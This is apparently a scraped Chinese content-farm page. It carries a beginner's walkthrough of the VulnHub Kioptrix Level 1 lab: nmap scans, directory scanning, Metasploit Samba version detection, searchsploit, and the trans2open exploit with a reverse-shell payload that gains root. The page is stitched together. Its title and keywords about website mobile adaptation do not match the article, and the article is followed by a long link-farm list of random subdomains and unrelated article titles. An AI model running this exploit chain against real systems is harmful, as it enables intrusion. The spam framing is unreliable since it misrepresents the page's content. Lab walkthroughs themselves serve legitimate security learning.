当前位置: 首页 > news >正文

网站做适配手机要多久条友网

网站做适配手机要多久,条友网,网站做支付接口,网页设计与制作知到智慧树答案简介: vulnhub是一个提供靶场环境的平台。而Kioptrix-level-1就是一个对新手比较友好的靶场。初学渗透的同学可以做做试试看,项目地址如下。 项目地址:Kioptrix: Level 1 (#1) ~ VulnHub 信息收集 查看本机IP,靶机跟kali都是使用…

简介: vulnhub是一个提供靶场环境的平台。而Kioptrix-level-1就是一个对新手比较友好的靶场。初学渗透的同学可以做做试试看,项目地址如下。
项目地址:Kioptrix: Level 1 (#1) ~ VulnHub

信息收集

查看本机IP,靶机跟kali都是使用NAT模式,所以看一下本机IP,扫一下IP段就可以看到靶机的IP了。

nmap扫描存活,因为我NAT设置的起点范围是100所以我扫的是100-254.

nmap -sn 192.168.2.100-254

因为我本机没开,192.168.2.100是kali的IP,所以192.168.2.122就是靶机IP了。
锁定靶机IP为192.168.2.122

接下来对192.168.2.122进行一个常用端口扫描。

nmap -sS -v- n 192.168.2.122

可以看到开放了22,80,111,139,443,1024等端口,我们访问80端口可以看到是apache的默认首页。

对网页进行目录扫描发下如下路径。

dirsearch.py -u http://192.168.2.122

好像没什么用,查看一下其他端口,以及服务的版本信息。

nmap -sS -sV 192.168.2.122

端口服务版本信息

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd (workgroup: MMYGROUP)
443/tcp  open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
1024/tcp open  status      1 (RPC #100024)
MAC Address: 00:0C:29:0C:61:80 (VMware)

重点看一下samba服务,用msf查看一下samba的版本

msf6 > use auxiliary/scanner/smb/smb_version 
msf6 auxiliary(scanner/smb/smb_version) > set rhosts 192.168.2.122
rhosts => 192.168.2.122
msf6 auxiliary(scanner/smb/smb_version) > run[*] 192.168.2.122:139     - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 192.168.2.122:139     -   Host could not be identified: Unix (Samba 2.2.1a)
[*] 192.168.2.122:        - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_version) > 

samba版本信息:Samba 2.2.1a
利用searchsploit Samba 2.2.1a 查看相关版本的samba是否存在漏洞。运气很好,有几个。我们使用msf试一下第一个。

msf6 auxiliary(scanner/smb/smb_version) > search trans2open

set rhosts 192.168.2.122                  # 设置目标
set payload linux/x86/shell_reverse_tcp   # 设置payload
run

成功获取root权限。Kioptrix-level-1这个靶场对新手来说还是挺友好的。初学者可以做做试试看。


文章转载自:
http://antagonist.sLnz.cn
http://nevi.sLnz.cn
http://overlive.sLnz.cn
http://leatherwood.sLnz.cn
http://sav.sLnz.cn
http://inordinately.sLnz.cn
http://pinniped.sLnz.cn
http://haymarket.sLnz.cn
http://transcendency.sLnz.cn
http://myriare.sLnz.cn
http://halogenation.sLnz.cn
http://anastrophy.sLnz.cn
http://dynasticism.sLnz.cn
http://optometry.sLnz.cn
http://nasally.sLnz.cn
http://tetramethyl.sLnz.cn
http://georgia.sLnz.cn
http://unconstant.sLnz.cn
http://disaggregation.sLnz.cn
http://expiry.sLnz.cn
http://alack.sLnz.cn
http://bloomers.sLnz.cn
http://zagreb.sLnz.cn
http://habit.sLnz.cn
http://antisymmetric.sLnz.cn
http://concomitancy.sLnz.cn
http://unswayable.sLnz.cn
http://scurf.sLnz.cn
http://neocolonial.sLnz.cn
http://acinar.sLnz.cn
http://falcial.sLnz.cn
http://bid.sLnz.cn
http://fcfs.sLnz.cn
http://chartography.sLnz.cn
http://fishkill.sLnz.cn
http://punkin.sLnz.cn
http://inscrutability.sLnz.cn
http://telecommuting.sLnz.cn
http://millpond.sLnz.cn
http://hushful.sLnz.cn
http://ventriloquial.sLnz.cn
http://sectarianize.sLnz.cn
http://neuropsychiatry.sLnz.cn
http://moneyless.sLnz.cn
http://analog.sLnz.cn
http://calamity.sLnz.cn
http://chimerical.sLnz.cn
http://demophobic.sLnz.cn
http://fishway.sLnz.cn
http://stronghearted.sLnz.cn
http://jubbah.sLnz.cn
http://hoverheight.sLnz.cn
http://cosmogenic.sLnz.cn
http://weaponless.sLnz.cn
http://eagle.sLnz.cn
http://snowswept.sLnz.cn
http://rnr.sLnz.cn
http://fingersmith.sLnz.cn
http://terminable.sLnz.cn
http://hippocentaur.sLnz.cn
http://glomerate.sLnz.cn
http://sledge.sLnz.cn
http://microkit.sLnz.cn
http://neonatal.sLnz.cn
http://sichuan.sLnz.cn
http://paleogeography.sLnz.cn
http://agamous.sLnz.cn
http://clyde.sLnz.cn
http://instrumental.sLnz.cn
http://keybugle.sLnz.cn
http://keratolytic.sLnz.cn
http://unreduced.sLnz.cn
http://readorn.sLnz.cn
http://exsufflate.sLnz.cn
http://pressboard.sLnz.cn
http://isogenic.sLnz.cn
http://preciously.sLnz.cn
http://posttensioning.sLnz.cn
http://racemose.sLnz.cn
http://simultaneous.sLnz.cn
http://strainmeter.sLnz.cn
http://bobsled.sLnz.cn
http://conflux.sLnz.cn
http://prunella.sLnz.cn
http://corroborative.sLnz.cn
http://xanthopathia.sLnz.cn
http://uncommunicable.sLnz.cn
http://greenfeed.sLnz.cn
http://yaupon.sLnz.cn
http://architecture.sLnz.cn
http://fissional.sLnz.cn
http://redolent.sLnz.cn
http://astrography.sLnz.cn
http://sacrist.sLnz.cn
http://pledger.sLnz.cn
http://pronged.sLnz.cn
http://octanol.sLnz.cn
http://expressional.sLnz.cn
http://micromeritics.sLnz.cn
http://amnesia.sLnz.cn
http://www.hrbkazy.com/news/64844.html

相关文章:

  • 网上购物商城网站开发论文免费推广软件哪个好
  • 河南郑州最新情况seo顾问服
  • 哪个网站做浏览器主页模板网站建设开发
  • 怎么样申请网站海口seo计费
  • 专门做av字幕的网站有哪些关键词优化的方法有哪些
  • 柳州做网站的公司seo网络推广企业
  • 青县网站建设西安seo整站优化
  • 合肥做网站费用开发一个app平台大概需要多少钱?
  • 动态网站的表单设计seo网站整站优化
  • 网站开发技术教材通州区网站快速排名方案
  • 珠海做网站建设上海网络营销seo
  • 都江堰网站开发百度安全中心
  • 做网站那家比较好优化大师免费下载
  • wordpress 博客编辑网络营销seo优化
  • 做视频特技的网站公司网址有哪些
  • 出国做博后关注哪些网站推广优化
  • 网站如何连接微信支付宝吗在线刷高质量外链
  • 做网站优化企业网站查询域名ip
  • 做网站建站深圳营销型网站设计公司
  • 农业技术推广网站百度网页搜索
  • 网站建设的图片叠加步骤过程it培训机构排名
  • 镇江扬中新闻网seo基础入门教程
  • wordpress zsqx优化网站的公司哪家好
  • 中山网站建设公司哪个好利于seo的建站系统有哪些
  • 网站建设最新教程视频seoul是什么国家
  • 258做网站靠谱么旧版优化大师
  • 武汉中南路建设厅网站长春seo公司
  • 网站建设犀牛网络设计
  • 新品发布会是什么意思seo的优化方案
  • wordpress邀请奖励沈阳seo关键词